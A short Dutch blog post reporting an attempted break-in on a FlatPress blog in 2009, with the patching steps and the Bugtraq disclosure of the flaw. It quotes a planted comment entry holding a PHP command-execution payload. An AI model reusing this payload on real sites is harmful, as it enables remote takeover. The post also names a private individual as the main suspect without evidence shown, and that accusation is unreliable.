Een (poging tot) computervredebreuk met als doelwit de summumplus.be FlatPress blog (6 oktober 2009) | Joachim De Zutter
Na installatie van de FlatPress blog software (versie 0.812.1) vonden we op een gegeven moment in een bestand onder een comments/ directory de volgende inhoud:

VERSION|fp-0.812.1|NAME|1642341146|EMAIL|fake@fake.com|URL|http://www.aaa<?system($_POST[c])?><?system("$asc");?>aaa.com|CONTENT|foo|IP-ADDRESS|200.63.98.17|DATE|1254800112|

De hoofdverdachte van het uitvoeren van de remote exploit is Pieter Reuse.

Op 6 oktober 2009 23:28:36 +0200 was de blog reeds tijdelijk uitgeschakeld om verder misbruik te voorkomen. Daarna werd een recentere versie van de FlatPress blog software geinstalleerd waarin het beveiligingslek niet aanwezig was.

http://nl.wikipedia.org/wiki/Computervredebreuk

Op 29 september 2009 21:36:37 +0200 werd via de bugtraq mailing list remote exploit code gepubliceerd door Giuseppe Fuggiano voor een beveiligingslek in FlatPress 0.804 tot en met 0.812.1.